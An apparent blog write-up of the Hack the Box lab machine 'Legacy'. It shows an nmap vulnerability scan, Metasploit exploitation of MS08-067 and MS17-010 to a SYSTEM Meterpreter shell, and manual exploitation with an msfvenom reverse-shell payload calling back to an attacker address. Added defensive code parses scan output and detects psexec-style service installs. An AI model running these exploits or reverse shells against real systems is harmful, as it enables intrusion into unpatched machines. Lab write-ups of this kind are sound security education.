Write-up Hack the Box Legacy

Arcy Caparros
8 min read, Jun 6, 2020


My write-up on HTB’s retired machine “Legacy”, covering exploitation with Metasploit and by hand.

Disclaimer

This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.

Reconnaissance

First, let’s run nmap with the following switches:

  • -Pn = Treat all hosts as online, skipping host discovery
  • -n = Never do DNS resolution
  • -sV = Probe open ports to determine service/version info
  • --script vuln = Run the NSE vulnerability-detection scripts against the discovered services
  • -oN = Save the scan output in nmap’s normal format to a .nmap file

nmap -Pn -n -sV --script vuln -oN Cust_10.10.10.4.nmap 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-30 22:08 EST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.4
Host is up (0.096s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Ports and services that needed to be enumerated further:

  • 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  • 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
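The vuln scan above is noisy: unrelated script errors, NOT VULNERABLE and access-denied results sit next to the two findings that matter. As an added example (not from the original write-up and not part of nmap), here is a small Python parser for nmap’s normal (-oN) output that pulls out the port table and every NSE result whose State is VULNERABLE, together with the CVE ids nmap prints. The embedded SAMPLE_SCAN is an abridged, constructed copy of the scan above; the regexes assume nmap’s normal-output layout (a `| script:` line opens a multi-line block, a `|_` line closes it, `|_script: value` is a one-line result).

```python
# Added example for this write-up (not from the original post or from nmap):
# a triage helper for nmap normal-format (-oN) output. SAMPLE_SCAN is a
# constructed, abridged copy of the scan shown above.
import re
from dataclasses import dataclass, field

SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.4
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| References:
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
"""

@dataclass
class Finding:
    script: str                                # NSE script name, e.g. smb-vuln-ms17-010
    title: str = ""
    state: str = ""                            # VULNERABLE / false / NT_STATUS_... / ERROR ...
    risk: str = ""
    cves: list = field(default_factory=list)

@dataclass
class HostReport:
    host: str = ""
    ports: list = field(default_factory=list)  # (port, proto, state, service, version)
    findings: list = field(default_factory=list)

    def open_ports(self):
        return [p[0] for p in self.ports if p[2] == "open"]

    def vulnerable(self):
        return [f for f in self.findings if f.state.upper() == "VULNERABLE"]

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(open|closed|filtered|open\|filtered)\s+(\S+)(?:\s+(.*))?$")
# NSE script names are lowercase letters, digits and hyphens; insisting on that keeps
# "VULNERABLE:" and "References:" lines inside a block from looking like a new block.
BLOCK_START_RE = re.compile(r"^\|\s+([a-z][a-z0-9-]*):\s*$")
ONELINE_RE = re.compile(r"^\|_\s*([a-z][a-z0-9-]*):(?:\s+(.*))?$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

def parse_nmap_normal(text):
    report, current, expect_title = HostReport(), None, False
    for raw in text.splitlines():
        line = raw.strip()
        if m := HOST_RE.match(line):
            report.host = m.group(1)
        elif m := PORT_RE.match(line):
            port, proto, state, service, version = m.groups()
            report.ports.append((int(port), proto, state, service, version or ""))
        elif not line.startswith("|"):
            continue
        elif m := ONELINE_RE.match(line):        # "|_script: value": single-line result
            report.findings.append(Finding(script=m.group(1), state=m.group(2) or ""))
            current = None
        elif m := BLOCK_START_RE.match(line):    # "| script:": opens a multi-line block
            current, expect_title = Finding(script=m.group(1)), False
            report.findings.append(current)
        elif line.startswith("|_"):              # "|_ ...": last line of a multi-line block
            current = None
        elif current is not None:                # a line inside the current block
            content = line[1:].strip()
            if content.endswith("VULNERABLE:"):  # "VULNERABLE:" / "NOT VULNERABLE:" header
                expect_title = True              # the next line carries the title
            elif expect_title:
                current.title, expect_title = content, False
            elif content.startswith("State:"):
                current.state = content[len("State:"):].strip()
            elif content.startswith("IDs:"):
                current.cves.extend(CVE_RE.findall(content))
            elif content.startswith("Risk factor:"):
                current.risk = content[len("Risk factor:"):].strip()
    return report

if __name__ == "__main__":
    r = parse_nmap_normal(SAMPLE_SCAN)
    print(f"{r.host}: open ports {r.open_ports()}")
    for f in r.vulnerable():
        print(f"  [{f.script}] {f.title} {f.cves} risk={f.risk or 'n/a'}")
```

Run it on a real `-oN` file by reading the file into `parse_nmap_normal`; the one-host structure here is enough for a single target, and a multi-host file would need the `Nmap scan report for` line to start a fresh HostReport.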

Enumeration

Microsoft Windows system vulnerable to remote code execution (MS08-067)

Searching for an exploit via ‘searchsploit’

We will start with the Metasploit module “exploit/windows/smb/ms08_067_netapi”

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.

References:
https://cvedetails.com/cve/CVE-2008-4250/
OSVDB (49243)
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

Search available module in Metasploit

Setup the module and the target host

Finally, run the exploit and we get a Meterpreter shell.

msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (180291 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.4:1035) at 2020-01-31 06:09:34 -0500
meterpreter >

Check what access we have using “getuid” and proceed to gather more information.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Drop into a system command shell; since we already have administrator-level access, we can read both the user and root flags directly.

meterpreter > shell
Process 748 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd../..
cd../..
C:\>cd Documents and Settings
cd Documents and Settings
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
16/03/2017 08:07 ▒▒ <DIR> .
16/03/2017 08:07 ▒▒ <DIR> ..
16/03/2017 08:07 ▒▒ <DIR> Administrator
16/03/2017 07:29 ▒▒ <DIR> All Users
16/03/2017 07:33 ▒▒ <DIR> john
0 File(s) 0 bytes
5 Dir(s) 6.400.843.776 bytes free
C:\Documents and Settings>cd john/'desktop'
cd john/'desktop'
The system cannot find the path specified.
C:\Documents and Settings>cd john/desktop
cd john/desktop
C:\Documents and Settings\john\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

"user flag"

Directory of C:\Documents and Settings\john\Desktop
16/03/2017 08:19 ▒▒ <DIR> .
16/03/2017 08:19 ▒▒ <DIR> ..
16/03/2017 08:19 ▒▒ 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.400.905.216 bytes free
C:\Documents and Settings\john\Desktop>cd../../Administrator
cd../../Administrator
C:\Documents and Settings\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator
16/03/2017 08:07 ▒▒ <DIR> .
16/03/2017 08:07 ▒▒ <DIR> ..
16/03/2017 08:18 ▒▒ <DIR> Desktop
16/03/2017 08:07 ▒▒ <DIR> Favorites
16/03/2017 08:07 ▒▒ <DIR> My Documents
16/03/2017 07:20 ▒▒ <DIR> Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.400.847.872 bytes free
C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

"root flag"

Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017 08:18 ▒▒ <DIR> .
16/03/2017 08:18 ▒▒ <DIR> ..
16/03/2017 08:18 ▒▒ 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.400.847.872 bytes free
C:\Documents and Settings\Administrator\Desktop>hostname
hostname
legacy
C:\Documents and Settings\Administrator\Desktop>

Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

We will use module 5, ‘exploit/windows/smb/ms17_010_psexec’

Description:
This module will exploit SMB with vulnerabilities in MS17-010 to
achieve a write-what-where primitive. This will then be used to
overwrite the connection session information as an
Administrator session. From there, the normal psexec payload code
execution is done. Exploits a type confusion between Transaction and
WriteAndX requests and a race condition in Transaction requests, as
seen in the EternalRomance, EternalChampion, and EternalSynergy
exploits. This exploit chain is more reliable than the EternalBlue
exploit, but requires a named pipe.

Also known as:
ETERNALSYNERGY
ETERNALROMANCE
ETERNALCHAMPION
ETERNALBLUE

Set up the module by defining the target host and run the exploit.

msf exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x81f09560
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... CYXsdIhC.exe
[*] 10.10.10.4:445 - Created \CYXsdIhC.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (180291 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \CYXsdIhC.exe...
[*] Meterpreter session 2 opened (10.10.14.5:4444 -> 10.10.10.4:1031) at 2020-01-31 06:57:54 -0500

Check what access we have using “getuid” and continue gathering information.

The results below show that we already have access to both the user and root flags; no further exploitation is needed.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd ../../
cd ../../
C:\>cd Documents and Settings
cd Documents and Settings
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
05/02/2020 03:20 ▒▒ <DIR> .
05/02/2020 03:20 ▒▒ <DIR> ..
16/03/2017 08:07 ▒▒ <DIR> Administrator
05/02/2020 03:20 ▒▒ 0 All
16/03/2017 07:29 ▒▒ <DIR> All Users
05/02/2020 03:20 ▒▒ 0 cd
05/02/2020 03:20 ▒▒ 0 dir
16/03/2017 07:33 ▒▒ <DIR> john
3 File(s) 0 bytes
5 Dir(s) 6.400.479.232 bytes free
C:\Documents and Settings>
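The psexec module output above is also a useful defender’s reference: an eight-character random binary (CYXsdIhC.exe) is written to a share root, registered and started as a service, and deleted once the stage is sent. On Windows Vista and later the service registration leaves an Event ID 7045 (“A service was installed in the system”) record in the System log. The following is an added example, not code from the write-up or from Metasploit, that scores such records for that pattern. SAMPLE_EVENTS is constructed (it assumes the service name matches the uploaded binary’s name, which the output above does not show), the PSEXESVC entry is Sysinternals PsExec’s default service name, and the weights and the “random-looking” test are heuristics to tune for your own fleet.

```python
# Added example for this write-up, not code from the original post or from
# Metasploit: scores Windows "service installed" records (System log, Event ID
# 7045, Vista and later) for the pattern the psexec output above shows. The
# records below are constructed; the service name is assumed to equal the
# uploaded binary's name, and the weights/thresholds are heuristics.
import re

SAMPLE_EVENTS = [
    {"EventID": 7045, "TimeCreated": "2020-01-31T11:57:50Z", "ServiceName": "CYXsdIhC",
     "ImagePath": "\\CYXsdIhC.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "TimeCreated": "2020-01-31T11:58:01Z", "ServiceName": "Sysmon64",
     "ImagePath": "C:\\Windows\\Sysmon64.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "TimeCreated": "2020-01-31T12:03:17Z", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "TimeCreated": "2020-01-31T12:10:00Z", "ServiceName": "BackupAgent",
     "ImagePath": "\"C:\\Program Files\\Backup\\agent.exe\" --svc",
     "AccountName": "NT AUTHORITY\\NetworkService"},
    {"EventID": 7036, "TimeCreated": "2020-01-31T11:57:51Z", "ServiceName": "CYXsdIhC",
     "ImagePath": "", "AccountName": ""},   # state change, not an install: ignored
]

KNOWN_TOOL_SERVICES = {"PSEXESVC"}   # default service name of Sysinternals PsExec


def looks_random(name):
    """Heuristic: 8 alphanumerics with at least three upper/lower case flips,
    as in the CYXsdIhC.exe name above. Real installers rarely look like this."""
    if len(name) != 8 or not name.isalnum():
        return False
    flips = sum(1 for a, b in zip(name, name[1:])
                if a.isalpha() and b.isalpha() and a.isupper() != b.isupper())
    return flips >= 3


def image_exe(image_path):
    """Split an ImagePath into (directory, exe stem), dropping quotes and arguments."""
    path = image_path.strip()
    path = path[1:].split('"', 1)[0] if path.startswith('"') else path.split(" ", 1)[0]
    directory, _, filename = path.rpartition("\\")
    stem = filename[:-4] if filename.lower().endswith(".exe") else filename
    return directory, stem


def score_service_install(event):
    """Return (score, reasons) for one 7045 record; other event ids score 0."""
    if event.get("EventID") != 7045:
        return 0, []
    name = event.get("ServiceName", "")
    directory, stem = image_exe(event.get("ImagePath", ""))
    checks = [
        (name.upper() in KNOWN_TOOL_SERVICES, 3, "known remote-execution tool service name"),
        (looks_random(name), 2, "random-looking service name"),
        (looks_random(stem), 2, "random-looking binary name"),
        # "\x.exe" (root of the share it was written through) or "C:\x.exe"
        (directory == "" or re.fullmatch(r"[A-Za-z]:", directory) is not None, 1,
         "binary placed at a share or drive root"),
    ]
    score = sum(weight for hit, weight, _ in checks if hit)
    reasons = [why for hit, _, why in checks if hit]
    return score, reasons


def detect(events, threshold=3):
    """Return (time, service name, score, reasons) for every record at or above threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_service_install(ev)
        if score >= threshold:
            alerts.append((ev["TimeCreated"], ev["ServiceName"], score, reasons))
    return alerts


if __name__ == "__main__":
    for when, svc, score, why in detect(SAMPLE_EVENTS):
        print(f"{when} service={svc} score={score}: {'; '.join(why)}")
```

In production you would feed this from the exported System log (or a SIEM query on Event ID 7045), allow-list your own deployment tools by service name and image path, and correlate a hit with the short-lived file at the share root and the reverse connection the payload makes back out.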

Manual exploitation

For our manual exploit of MS17-010, let’s leverage https://github.com/helviojunior/MS17-010

The Python exploit is fairly straightforward and needs no modification other than creating your own reverse-shell payload with msfvenom.

root@cainta:~/Documents/htb/Legacy/10.10.10.4/MS17-010# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.37 LPORT=4444 -f exe > eternalblue.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Set up netcat

root@cainta:~/Documents/htb/Legacy/10.10.10.4/MS17-010# rlwrap nc -nlvp 4444
listening on [any] 4444 ...

Execute our exploit and payload

“Foothold”

connect to [10.10.14.37] from (UNKNOWN) [10.10.10.4] 1028
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>hostname
hostname
legacy

“User flag”

Directory of C:\Documents and Settings\john
16/03/2017 08:33 ▒▒ <DIR> .
16/03/2017 08:33 ▒▒ <DIR> ..
16/03/2017 09:19 ▒▒ <DIR> Desktop
16/03/2017 08:33 ▒▒ <DIR> Favorites
16/03/2017 08:33 ▒▒ <DIR> My Documents
16/03/2017 08:20 ▒▒ <DIR> Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.472.708.096 bytes free
C:\Documents and Settings\john>cd Desktop
cd Desktop
C:\Documents and Settings\john\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john\Desktop
16/03/2017 09:19 ▒▒ <DIR> .
16/03/2017 09:19 ▒▒ <DIR> ..
16/03/2017 09:19 ▒▒ 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.472.708.096 bytes free
C:\Documents and Settings\john\Desktop>

“Root flag”

There is no need to escalate privileges; we already have administrator access.

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017 09:18 ▒▒ <DIR> .
16/03/2017 09:18 ▒▒ <DIR> ..
16/03/2017 09:18 ▒▒ 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.472.708.096 bytes free
C:\Documents and Settings\Administrator\Desktop>

References

  1. https://github.com/helviojunior/MS17-010
  2. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
  3. https://cvedetails.com/cve/CVE-2017-0143/
  4. https://cvedetails.com/cve/CVE-2017-0146/
  5. https://cvedetails.com/cve/CVE-2017-0147/
  6. https://github.com/worawit/MS17-010
  7. https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf
  8. https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/
